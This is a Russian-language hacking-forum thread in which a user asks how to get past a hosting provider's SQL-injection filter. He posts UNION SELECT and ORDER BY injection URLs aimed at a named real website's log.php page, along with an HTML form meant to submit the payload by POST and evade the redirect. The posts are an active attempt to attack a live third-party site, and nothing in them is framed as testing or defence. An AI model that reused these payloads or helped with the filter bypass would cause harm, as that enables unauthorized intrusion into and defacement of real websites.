Не нащёл куда нажаловаться такчто пишу сюда В общем сайты которые висят на этом хостинге никак неполучается сломать, чуть что-то нетак в SQL запросе и кадает на http://2.sweb.ru/insecure Я ваще думал что обойти никак низя, но нащёл сайт с SQL inj висящий на этом хостинге и задефейсеный МБ другая дыра там была, но я склоняюсь к скуле... В общем вот дырко Code: http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()/* если прописать from+table/* ... ну сами в общем пасмарите... Вопрос по хостингу, как обойти эту сраную фильтрацию, или как это назвать Возможно-ли это ваще...
Эх! Прочитал я тему и был уверен что всё получится... А нет... Навоял такую форму Code: <form method="post" action="http://www.flotov.net/log.php"> <input name="id" type="text" size="200"><br> <input type="submit"> </form> Взял существующий ID http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358 и вбил Code: bdc26a63b13ccabfd478f160e46da358 в поле, норм, сработало, тогда вбил Code: bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/* не сработало, а так работает Code: http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/* Пробовал пару разных вариантов, 0 [Update] Щас подумал, мб вы имеете в виду Code: <form method="post" action="http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()+FROM+Users/*"> Но нет, редирект P.S. Я звеняюсь, но я сваливаю спать, буду вечером